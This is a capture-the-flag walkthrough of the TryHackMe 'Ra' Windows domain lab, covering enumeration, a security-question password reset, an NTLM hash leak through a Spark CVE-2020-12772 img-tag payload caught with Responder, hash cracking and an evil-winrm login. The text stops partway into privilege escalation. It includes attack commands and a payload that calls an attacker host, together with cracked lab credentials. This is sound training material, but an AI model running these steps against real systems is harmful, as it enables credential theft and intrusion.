TryHackMe Ra Writeup
19 min readNov 8, 2022
Ra Walkthrough
Overview
This windows box involved a lot of enumeration. It starts with us resetting an account via the poorly implemented reset password functionality on the web server.Then we are able to enumerate smb. We find installation files for spark 2.8.3 which is vulnerable CVE-2020-12772. We get the NTLM hash for a user on the box. The user is a part of the Account Operators group and we find a powershell script that is being run automatically, we change the password of the user who owns the script that is scheduled to run automatically every few minutes. We modify and add another user to the domain and add the newly created user in the administrators group. Now we can use psexec or Evil-WinRM to login as the user we created who is part of the administrators group.
Enumeration
Nmap Scan
Nmap 7.80 scan initiated Oct 14 20:13:25 2022 as: nmap -p- --min-rate 10000 -T4 -sC -sV -v -Pn -oN nmap-scan 10.10.226.131Nmap scan report for 10.10.226.131Host is up (0.16s latency).Not shown: 65500 filtered portsPORT STATE SERVICE VERSION53/tcp open domain?| fingerprint-strings:| DNSVersionBindReqTCP:| version|_ bind80/tcp open http Microsoft IIS httpd 10.0| http-methods:| Supported Methods: OPTIONS TRACE GET HEAD POST|_ Potentially risky methods: TRACE|_http-server-header: Microsoft-IIS/10.0|_http-title: Windcorp.88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-11-14 14:44:27Z)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)| http-auth:| HTTP/1.1 401 Unauthorized\x0D| Negotiate|_ NTLM| http-methods:|_ Supported Methods: OPTIONS| http-ntlm-info:| Target_Name: WINDCORP| NetBIOS_Domain_Name: WINDCORP| NetBIOS_Computer_Name: FIRE| DNS_Domain_Name: windcorp.thm| DNS_Computer_Name: Fire.windcorp.thm| DNS_Tree_Name: windcorp.thm|_ Product_Version: 10.0.17763|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Site doesnt have a title.| ssl-cert: Subject: commonName=Windows Admin Center| Subject Alternative Name: DNS:WIN-2FAA40QQ70B| Issuer: commonName=Windows Admin Center| Public Key type: rsa| Public Key bits: 2048| Signature Algorithm: sha512WithRSAEncryption| Not valid before: 2020-04-30T14:41:03| Not valid after: 2020-06-30T14:41:02| MD5: 31ef ecc2 3c93 81b1 67cf 3015 a99f 1726|_SHA-1: ef2b ac66 5e99 dae7 1182 73a1 93e8 a0b7 c772 f49c|_ssl-date: 2020-11-14T14:47:28+00:00; +30s from scanner time.| tls-alpn:|_ http/1.1445/tcp open microsoft-ds?464/tcp open kpasswd5?593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open ldapssl?2179/tcp open vmrdp?3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)3269/tcp open globalcatLDAPssl?3389/tcp open ms-wbt-server Microsoft Terminal Services| rdp-ntlm-info:| Target_Name: WINDCORP| NetBIOS_Domain_Name: WINDCORP| NetBIOS_Computer_Name: FIRE| DNS_Domain_Name: windcorp.thm| DNS_Computer_Name: Fire.windcorp.thm| DNS_Tree_Name: windcorp.thm| Product_Version: 10.0.17763|_ System_Time: 2020-11-14T14:46:51+00:00| ssl-cert: Subject: commonName=Fire.windcorp.thm| Issuer: commonName=Fire.windcorp.thm| Public Key type: rsa| Public Key bits: 2048| Signature Algorithm: sha256WithRSAEncryption| Not valid before: 2020-11-13T14:23:32| Not valid after: 2021-05-15T14:23:32| MD5: 6807 9b9e 1b7c 5868 04d2 2c76 0cff d0f3|_SHA-1: 0120 f2b6 78c5 cd14 1f35 edb9 3f5d 853a 9c78 788b|_ssl-date: 2020-11-14T14:47:29+00:00; +31s from scanner time.5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later| xmpp-info:| STARTTLS Failed| info:| features:|| errors:| invalid-namespace| (timeout)| compression_methods:|| capabilities:|| xmpp:| version: 1.0| auth_mechanisms:|| stream_id: 8m9lbpgdkf|_ unknown:5223/tcp open ssl/hpvirtgrp?5229/tcp open jaxflow?5262/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later| xmpp-info:| STARTTLS Failed| info:| features:|| errors:| invalid-namespace| (timeout)| compression_methods:|| capabilities:|| xmpp:| version: 1.0| auth_mechanisms:|| stream_id: 1d9uzzborg|_ unknown:5263/tcp open ssl/unknown5269/tcp open xmpp Wildfire XMPP Client| xmpp-info:| STARTTLS Failed| info:| features:|| errors:| (timeout)| compression_methods:|| xmpp:|| auth_mechanisms:|| capabilities:||_ unknown:5270/tcp open ssl/xmp?5275/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later| xmpp-info:| STARTTLS Failed| info:| features:|| errors:| invalid-namespace| (timeout)| compression_methods:|| capabilities:|| xmpp:| version: 1.0| auth_mechanisms:|| stream_id: 936v5nk59h|_ unknown:5276/tcp open ssl/unknown5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found7070/tcp open http Jetty 9.4.18.v20190429| http-methods:|_ Supported Methods: GET HEAD POST OPTIONS|_http-server-header: Jetty(9.4.18.v20190429)|_http-title: Openfire HTTP Binding Service7443/tcp open ssl/http Jetty 9.4.18.v20190429| http-methods:|_ Supported Methods: GET HEAD POST OPTIONS|_http-server-header: Jetty(9.4.18.v20190429)|_http-title: Openfire HTTP Binding Service| ssl-cert: Subject: commonName=fire.windcorp.thm| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm| Issuer: commonName=fire.windcorp.thm| Public Key type: rsa| Public Key bits: 2048| Signature Algorithm: sha256WithRSAEncryption| Not valid before: 2020-05-01T08:39:00| Not valid after: 2025-04-30T08:39:00| MD5: b715 5425 83f3 a20f 75c8 ca2d 3353 cbb7|_SHA-1: 97f7 0772 a26b e324 7ed5 bbcb 5f35 7d74 7982 66ae7777/tcp open socks5 (No authentication; connection failed)| socks-auth-info:|_ No authentication9090/tcp open zeus-admin?| fingerprint-strings:| GetRequest:| HTTP/1.1 200 OK| Date: Sat, 14 Nov 2020 14:44:26 GMT| Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT| Content-Type: text/html| Accept-Ranges: bytes| Content-Length: 115| <html>| <head><title></title>| <meta http-equiv="refresh" content="0;URL=index.jsp">| </head>| <body>| </body>| </html>| HTTPOptions:| HTTP/1.1 200 OK| Date: Sat, 14 Nov 2020 14:44:34 GMT| Allow: GET,HEAD,POST,OPTIONS| JavaRMI, drda, ibm-db2-das, informix:| HTTP/1.1 400 Illegal character CNTL=0x0| Content-Type: text/html;charset=iso-8859-1| Content-Length: 69| Connection: close| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>| SqueezeCenter_CLI:| HTTP/1.1 400 No URI| Content-Type: text/html;charset=iso-8859-1| Content-Length: 49| Connection: close| <h1>Bad Message 400</h1><pre>reason: No URI</pre>| WMSRequest:| HTTP/1.1 400 Illegal character CNTL=0x1| Content-Type: text/html;charset=iso-8859-1| Content-Length: 69| Connection: close|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>9091/tcp open ssl/xmltec-xmlmail?| fingerprint-strings:| DNSStatusRequestTCP, DNSVersionBindReqTCP:| HTTP/1.1 400 Illegal character CNTL=0x0| Content-Type: text/html;charset=iso-8859-1| Content-Length: 69| Connection: close| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>| GetRequest:| HTTP/1.1 200 OK| Date: Sat, 14 Nov 2020 14:44:47 GMT| Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT| Content-Type: text/html| Accept-Ranges: bytes| Content-Length: 115| <html>| <head><title></title>| <meta http-equiv="refresh" content="0;URL=index.jsp">| </head>| <body>| </body>| </html>| HTTPOptions:| HTTP/1.1 200 OK| Date: Sat, 14 Nov 2020 14:44:47 GMT| Allow: GET,HEAD,POST,OPTIONS| Help:| HTTP/1.1 400 No URI| Content-Type: text/html;charset=iso-8859-1| Content-Length: 49| Connection: close| <h1>Bad Message 400</h1><pre>reason: No URI</pre>| RPCCheck:| HTTP/1.1 400 Illegal character OTEXT=0x80| Content-Type: text/html;charset=iso-8859-1| Content-Length: 71| Connection: close| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>| RTSPRequest:| HTTP/1.1 400 Unknown Version| Content-Type: text/html;charset=iso-8859-1| Content-Length: 58| Connection: close| <h1>Bad Message 400</h1><pre>reason: Unknown Version</pre>| SSLSessionReq:| HTTP/1.1 400 Illegal character CNTL=0x16| Content-Type: text/html;charset=iso-8859-1| Content-Length: 70| Connection: close|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>| ssl-cert: Subject: commonName=fire.windcorp.thm| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm| Issuer: commonName=fire.windcorp.thm| Public Key type: rsa| Public Key bits: 2048| Signature Algorithm: sha256WithRSAEncryption| Not valid before: 2020-05-01T08:39:00| Not valid after: 2025-04-30T08:39:00| MD5: b715 5425 83f3 a20f 75c8 ca2d 3353 cbb7|_SHA-1: 97f7 0772 a26b e324 7ed5 bbcb 5f35 7d74 7982 66ae9389/tcp open mc-nmf .NET Message Framing49670/tcp open msrpc Microsoft Windows RPC49675/tcp open msrpc Microsoft Windows RPC49700/tcp open msrpc Microsoft Windows RPC49892/tcp open msrpc Microsoft Windows RPCHost script results:|_clock-skew: mean: 30s, deviation: 0s, median: 30s| smb2-security-mode:| 2.02:|_ Message signing enabled and required| smb2-time:| date: 2020-11-14T14:46:53|_ start_date: N/ARead data files from: /usr/bin/../share/nmapService detection performed. Please report any incorrect results at https://nmap.org/submit/ .# Nmap done at Sat Nov 14 20:23:10 2020 -- 1 IP address (1 host up) scanned in 584.63 seconds
From the nmap scan we find that the DNS_Domain_Name: windcorp.thm and the ssl-cert script is leaking a hostname fire.windcorp.thm. Adding both of these to my /etc/hosts file.
Port 80
We see a Rest Password button, which asks for the username and the answer to any of the 4 security questions:
On the main page we find a list of the staff with their usernames.
Let’s create a username list.
organicfish718organicwolf509tinywolf424angrybird253buseEdeltrautEdwardEmilebrownostrich284sadswan869whiteleopard529happymeercat399orangegorilla428
There is a section “Employees in Focus” and looking at the picture names revealed Lily Levesque’s pet’s name. Now we can use the reset password functionality to reset her password. So the username is lilyle and pet’s name is Sparky.
Enumerating SMB
Let’s look at the smb shares and the password policy, looking at the password policy is good before doing any bruteforcing because if there is an account lock out policy set then we might end up locking out accounts and that’s not what we want.
┌──(h4ck3r㉿kali)-[~/Documents/flags/tryhackme/ra]└─$ crackmapexec smb windcorp.thm -u lilyle -p 'ChangeMe#1234' --sharesSMB 10.10.226.131 445 FIRE [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)SMB 10.10.226.131 445 FIRE [+] windcorp.thm\lilyle:ChangeMe#1234SMB 10.10.226.131 445 FIRE [+] Enumerated sharesSMB 10.10.226.131 445 FIRE Share Permissions RemarkSMB 10.10.226.131 445 FIRE ----- ----------- ------SMB 10.10.226.131 445 FIRE ADMIN$ Remote AdminSMB 10.10.226.131 445 FIRE C$ Default shareSMB 10.10.226.131 445 FIRE IPC$ READ Remote IPCSMB 10.10.226.131 445 FIRE NETLOGON READ Logon server shareSMB 10.10.226.131 445 FIRE Shared READSMB 10.10.226.131 445 FIRE SYSVOL READ Logon server shareSMB 10.10.226.131 445 FIRE Users READ┌──(h4ck3r㉿kali)-[~/Documents/flags/tryhackme/ra]└─$ crackmapexec smb windcorp.thm -u lilyle -p 'ChangeMe#1234' --pass-polSMB 10.10.226.131 445 FIRE [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)SMB 10.10.226.131 445 FIRE [+] windcorp.thm\lilyle:ChangeMe#1234SMB 10.10.226.131 445 FIRE [+] Dumping password info for domain: WINDCORPSMB 10.10.226.131 445 FIRE Minimum password length: 7SMB 10.10.226.131 445 FIRE Password history length: 24SMB 10.10.226.131 445 FIRE Maximum password age:SMB 10.10.226.131 445 FIRESMB 10.10.226.131 445 FIRE Password Complexity Flags: 010001SMB 10.10.226.131 445 FIRE Domain Refuse Password Change: 0SMB 10.10.226.131 445 FIRE Domain Password Store Cleartext: 1SMB 10.10.226.131 445 FIRE Domain Password Lockout Admins: 0SMB 10.10.226.131 445 FIRE Domain Password No Clear Change: 0SMB 10.10.226.131 445 FIRE Domain Password No Anon Change: 0SMB 10.10.226.131 445 FIRE Domain Password Complex: 1SMB 10.10.226.131 445 FIRESMB 10.10.226.131 445 FIRE Minimum password age:SMB 10.10.226.131 445 FIRE Reset Account Lockout Counter: 2 minutesSMB 10.10.226.131 445 FIRE Locked Account Duration: 2 minutesSMB 10.10.226.131 445 FIRE Account Lockout Threshold: 5SMB 10.10.226.131 445 FIRE Forced Log off Time: Not Set
According to the password policy there is a lockout threshold of 5 which means if we provide the wrong passsword 5 times for a user, then we would end up locking out that account for the Locked Account Duration which is 2 minutes in this case. So let’s avoid brute-forcing smb and continue exploring the smb shares accessible by lilyle.
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]└─$ smbmap -u 'lilyle' -p 'ChangeMe#1234' -H windcorp.thm -r 130 ⨯[+] IP: windcorp.thm:445 Name: unknownDisk Permissions Comment---- ----------- -------ADMIN$ NO ACCESS Remote AdminC$ NO ACCESS Default shareIPC$ READ ONLY Remote IPC.\IPC$\*fr--r--r-- 3 Mon Jan 1 05:53:28 1601 InitShutdownfr--r--r-- 4 Mon Jan 1 05:53:28 1601 lsassfr--r--r-- 3 Mon Jan 1 05:53:28 1601 ntsvcsfr--r--r-- 4 Mon Jan 1 05:53:28 1601 scerpcfr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-244-0fr--r--r-- 3 Mon Jan 1 05:53:28 1601 epmapperfr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-2b8-0fr--r--r-- 3 Mon Jan 1 05:53:28 1601 LSM_API_servicefr--r--r-- 3 Mon Jan 1 05:53:28 1601 eventlogfr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-530-0fr--r--r-- 3 Mon Jan 1 05:53:28 1601 atsvcfr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-734-0fr--r--r-- 4 Mon Jan 1 05:53:28 1601 wkssvcfr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-340-0fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-340-1fr--r--r-- 3 Mon Jan 1 05:53:28 1601 RpcProxy\49674fr--r--r-- 3 Mon Jan 1 05:53:28 1601 1fa260e57b61ac4efr--r--r-- 3 Mon Jan 1 05:53:28 1601 RpcProxy\593fr--r--r-- 4 Mon Jan 1 05:53:28 1601 srvsvcfr--r--r-- 3 Mon Jan 1 05:53:28 1601 spoolssfr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-964-0fr--r--r-- 3 Mon Jan 1 05:53:28 1601 netdfsfr--r--r-- 3 Mon Jan 1 05:53:28 1601 ROUTERfr--r--r-- 3 Mon Jan 1 05:53:28 1601 W32TIME_ALTfr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-32c-0fr--r--r-- 1 Mon Jan 1 05:53:28 1601 PSHost.132498373871065180.4064.DefaultAppDomain.powershellfr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-cd0-0fr--r--r-- 3 Mon Jan 1 05:53:28 1601 TermSrv_API_servicefr--r--r-- 3 Mon Jan 1 05:53:28 1601 Ctx_WinStation_API_servicefr--r--r-- 3 Mon Jan 1 05:53:28 1601 SessEnvPublicRpcfr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-16fc-0fr--r--r-- 1 Mon Jan 1 05:53:28 1601 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDERfr--r--r-- 1 Mon Jan 1 05:53:28 1601 PSHost.132498373859437939.3600.DefaultAppDomain.smefr--r--r-- 1 Mon Jan 1 05:53:28 1601 PSHost.132498374391876309.3004.DefaultAppDomain.powershellfr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-cb0-0fr--r--r-- 1 Mon Jan 1 05:53:28 1601 iisipmff316478-5d8e-4104-a522-2909c9a54989fr--r--r-- 1 Mon Jan 1 05:53:28 1601 iislogpipeadb9a285-0017-403b-b5a4-8dbfb24435c9NETLOGON READ ONLY Logon server share.\NETLOGON\*dr--r--r-- 0 Sat May 2 15:32:19 2020 .dr--r--r-- 0 Sat May 2 15:32:19 2020 ..Shared READ ONLY.\Shared\*dr--r--r-- 0 Sat May 30 06:15:42 2020 .dr--r--r-- 0 Sat May 30 06:15:42 2020 ..fr--r--r-- 45 Fri May 1 21:02:36 2020 Flag 1.txtfr--r--r-- 29526628 Sat May 30 06:15:01 2020 spark_2_8_3.debfr--r--r-- 99555201 Sun May 3 16:38:39 2020 spark_2_8_3.dmgfr--r--r-- 78765568 Sun May 3 16:38:39 2020 spark_2_8_3.exefr--r--r-- 123216290 Sun May 3 16:38:39 2020 spark_2_8_3.tar.gzSYSVOL READ ONLY Logon server share.\SYSVOL\*dr--r--r-- 0 Sat May 2 15:32:20 2020 .dr--r--r-- 0 Sat May 2 15:32:20 2020 ..dr--r--r-- 0 Sat May 2 15:32:20 2020 NRznLVEcPjdr--r--r-- 0 Thu Apr 30 20:41:10 2020 windcorp.thmUsers READ ONLY.\Users\*dw--w--w-- 0 Sun May 3 03:35:58 2020 .dw--w--w-- 0 Sun May 3 03:35:58 2020 ..dr--r--r-- 0 Sun May 10 16:48:11 2020 Administratordr--r--r-- 0 Fri May 1 06:03:55 2020 All Usersdr--r--r-- 0 Fri May 1 18:39:44 2020 angrybirddr--r--r-- 0 Fri May 1 18:39:34 2020 bergdr--r--r-- 0 Fri May 1 18:39:22 2020 bluefrog579dr--r--r-- 0 Sun May 3 19:00:02 2020 brittanycrdr--r--r-- 0 Fri May 1 18:39:08 2020 brownostrich284dr--r--r-- 0 Sat Nov 14 19:55:12 2020 busedw--w--w-- 0 Fri May 1 05:05:11 2020 Defaultdr--r--r-- 0 Fri May 1 06:03:55 2020 Default Userfr--r--r-- 174 Fri May 1 06:01:55 2020 desktop.inidr--r--r-- 0 Fri May 1 18:38:54 2020 edwarddr--r--r-- 0 Sun May 3 05:00:16 2020 freddydr--r--r-- 0 Fri May 1 18:38:28 2020 garysdr--r--r-- 0 Sat Nov 14 22:21:05 2020 goldencat416dr--r--r-- 0 Fri May 1 18:38:17 2020 goldenwoldr--r--r-- 0 Fri May 1 18:38:06 2020 happdr--r--r-- 0 Fri May 1 18:37:53 2020 happymedr--r--r-- 0 Fri May 1 18:37:42 2020 Luisdr--r--r-- 0 Fri May 1 18:37:31 2020 orgadr--r--r-- 0 Fri May 1 18:37:19 2020 organicfdr--r--r-- 0 Sat Nov 14 22:21:59 2020 organicfish718dr--r--r-- 0 Fri May 1 18:37:06 2020 petedw--w--w-- 0 Thu Apr 30 20:05:47 2020 Publicdr--r--r-- 0 Fri May 1 18:36:54 2020 purplecatdr--r--r-- 0 Fri May 1 18:36:42 2020 purplepandadr--r--r-- 0 Fri May 1 18:36:31 2020 sadswandr--r--r-- 0 Sat Nov 14 22:17:23 2020 sadswan869dr--r--r-- 0 Fri May 1 18:36:20 2020 sheeladr--r--r-- 0 Fri May 1 18:35:39 2020 silverdr--r--r-- 0 Fri May 1 18:35:24 2020 smallfdr--r--r-- 0 Fri May 1 18:35:05 2020 spiffdr--r--r-- 0 Fri May 1 18:34:49 2020 tinygoosdr--r--r-- 0 Fri May 1 18:33:57 2020 whiteleopard┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]└─$ smbclient -U lilyle //windcorp.thm/Shared 1 ⨯Enter WORKGROUP\lilyle's password:Try "help" to get a list of possible commands.smb: \> ls. D 0 Sat May 30 06:15:42 2020.. D 0 Sat May 30 06:15:42 2020Flag 1.txt A 45 Fri May 1 21:02:36 2020spark_2_8_3.deb A 29526628 Sat May 30 06:15:01 2020spark_2_8_3.dmg A 99555201 Sun May 3 16:36:58 2020spark_2_8_3.exe A 78765568 Sun May 3 16:35:56 2020spark_2_8_3.tar.gz A 123216290 Sun May 3 16:37:24 202015587583 blocks of size 4096. 10895808 blocks availablesmb: \> get "Flag 1.txt"getting file \Flag 1.txt of size 45 as Flag 1.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)smb: \> exit┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]└─$ cat 'Flag 1.txt'THM{466d52dc75******************************}
There are also many installation files for Spark 2.8.3, and based on quick google search we find that Spark 2.8.3 is vulnerable. I will grab the .deb file from the smb share.
On reading about the CVE-2020-12772, I found this github repository which was actually created by the makers of this machine. According to this, We can send a message with an img tag to another user using spark and each time the user clicks the link, or the ROAR module automatically preloads it, the external server receives the request for the image, together with the NTLM hashes from the user that visits the link, i.e. the user you are chatting with!
As explained in the github repo, we will use responder and send a message with an img tag and we should recieve the NTLM hash of the user who visits the link.
We have a usernames list we can send our payload “<img src=http://yourtun0IP/a.png>” to different users and check in responder if we get the NTLM hash for any of them.
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]└─$ sudo responder -I tun0[sudo] password for sid:__.----.-----.-----.-----.-----.-----.--| |.-----.----.| _| -__|__ --| _ | _ | | _ || -__| _||__| |_____|_____| __|_____|__|__|_____||_____|__||__|NBT-NS, LLMNR & MDNS Responder 3.0.2.0Author: Laurent Gaffie (laurent.gaffie@gmail.com)To kill this script hit CTRL-C[+] Poisoners:LLMNR [ON]NBT-NS [ON]DNS/MDNS [ON][+] Servers:HTTP server [ON]HTTPS server [ON]WPAD proxy [OFF]Auth proxy [OFF]SMB server [ON]Kerberos server [ON]SQL server [ON]FTP server [ON]IMAP server [ON]POP3 server [ON]SMTP server [ON]DNS server [ON]LDAP server [ON]RDP server [ON][+] HTTP Options:Always serving EXE [OFF]Serving EXE [OFF]Serving HTML [OFF]Upstream Proxy [OFF][+] Poisoning Options:Analyze Mode [OFF]Force WPAD auth [OFF]Force Basic Auth [OFF]Force LM downgrade [OFF]Fingerprint hosts [OFF][+] Generic Options:Responder NIC [tun0]Responder IP [10.8.82.29]Challenge set [random]Don't Respond To Names ['ISATAP'][+] Listening for events...[HTTP] NTLMv2 Client : 10.10.226.131[HTTP] NTLMv2 Username : WINDCORP\buse[HTTP] NTLMv2 Hash : buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:01010000000000003016F4F0AEBAD6019F1E18DD6C6FF8DD000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C000800300030000000000000000100000000200000D06AF3C0BE5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A00100000000000000000000000000000000000090000000000000000000000[*] Skipping previously captured hash for WINDCORP\buse
Let’s crack this hash with help of john the ripper.
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]└─$ echo "buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:01010000000000003016F4F0AEBAD6019F1E18DD6C6FF8DD000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C000800300030000000000000000100000000200000D06AF3C0BE5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A00100000000000000000000000000000000000090000000000000000000000" > hash┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txtUsing default input encoding: UTF-8Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])Will run 4 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusuzunLM+3131 (buse)1g 0:00:00:02 DONE (2020-11-14 23:27) 0.3355g/s 993073p/s 993073c/s 993073C/s v0yage..uya051Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliablySession completed
We successfully cracked buse’s password let’s check in crackmapexec if we can psexec or winrm into the box.
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]└─$ crackmapexec smb windcorp.thm -u buse -p 'uzunLM+3131'SMB 10.10.226.131 445 FIRE [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)SMB 10.10.226.131 445 FIRE [+] windcorp.thm\buse:uzunLM+3131┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]└─$ crackmapexec winrm windcorp.thm -u buse -p 'uzunLM+3131'WINRM 10.10.226.131 5985 FIRE [*] http://10.10.226.131:5985/wsmanWINRM 10.10.226.131 5985 FIRE [+] WINDCORP\buse:uzunLM+3131 (Pwn3d!)
crackmapexec says Pwn3d! for winrm that means we can use Evil-WinRM to get on the box.
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]└─$ evil-winrm -i windcorp.thm -u buse -p 'uzunLM+3131'Evil-WinRM shell v2.3Info: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\buse\Documents> whoamiwindcorp\buse*Evil-WinRM* PS C:\Users\buse\Documents> cd ../Desktop*Evil-WinRM* PS C:\Users\buse\Desktop> dirDirectory: C:\Users\buse\DesktopMode LastWriteTime Length Name---- ------------- ------ ----d----- 5/7/2020 3:00 AM Also stuffd----- 5/7/2020 2:58 AM Stuff-a---- 5/2/2020 11:53 AM 45 Flag 2.txt-a---- 5/1/2020 8:33 AM 37 Notes.txt*Evil-WinRM* PS C:\Users\buse\Desktop> type "Flag 2.txt"THM{6f690fc72b******************************}
Privilege Escalation
First we check what all groups the user buse is part of and if there is any special privilege we have.
*Evil-WinRM* PS C:\users> whoami /allUSER INFORMATION----------------User Name SID============= ============================================windcorp\buse S-1-5-21-555431066-3599073733-176599750-5777GROUP INFORMATION-----------------Group Name Type SID Attributes=========================================== ================ ============================================ ==================================================Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled groupBUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled groupBUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled groupBUILTIN\Account Operators Alias S-1-5-32-548 Mandatory group, Enabled by default, Enabled groupBUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled groupBUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled groupNT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled groupNT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled groupNT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled groupWINDCORP\IT Group S-1-5-21-555431066-3599073733-176599750-5865 Mandatory group, Enabled by default, Enabled groupNT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled groupMandatory Label\Medium Plus Mandatory Level Label S-1-16-8448PRIVILEGES INFORMATION----------------------Privilege Name Description State============================= ============================== =======SeMachineAccountPrivilege Add workstations to domain EnabledSeChangeNotifyPrivilege Bypass traverse checking EnabledSeIncreaseWorkingSetPrivilege Increase a process working set EnabledUSER CLAIMS INFORMATION-----------------------User claims unknown.Kerberos support for Dynamic Access Control on this device has been disabled.
We see that we are part of the Account Operators group that means we can modify all accounts except admin accounts. Then on checking different directories we find a scripts directory which has a checkservers.ps1 powershell script, which tells us that “C:\Users\brittanycr\hosts.txt” is being run/used automatically.
*Evil-WinRM* PS C:\scripts> dirDirectory: C:\scriptsMode LastWriteTime Length Name---- ------------- ------ -----a---- 5/3/2020 5:53 AM 4119 checkservers.ps1-a---- 11/14/2020 10:14 AM 31 log.txt*Evil-WinRM* PS C:\scripts> type log.txtLast run: 11/14/2020 10:15:03*Evil-WinRM* PS C:\scripts> .\checkservers.ps111/14/2020 10:15:16 AMAccess is deniedAt C:\scripts\checkservers.ps1:25 char:1+ get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match ...+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+ CategoryInfo : PermissionDenied: (C:\Users\brittanycr\hosts.txt:String) [Get-Content], UnauthorizedAccessException+ FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommandCannot find path 'C:\Users\brittanycr\hosts.txt' because it does not exist.At C:\scripts\checkservers.ps1:25 char:1+ get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match ...+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+ CategoryInfo : ObjectNotFound: (C:\Users\brittanycr\hosts.txt:String) [Get-Content], ItemNotFoundException+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommandLast run: 11/14/2020 10:15:17Access to the path 'C:\scripts\log.txt' is denied.At C:\scripts\checkservers.ps1:81 char:1+ Set-Content -Path C:\scripts\log.txt -Value $log+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+ CategoryInfo : NotSpecified: (:) [Set-Content], UnauthorizedAccessException+ FullyQualifiedErrorId : 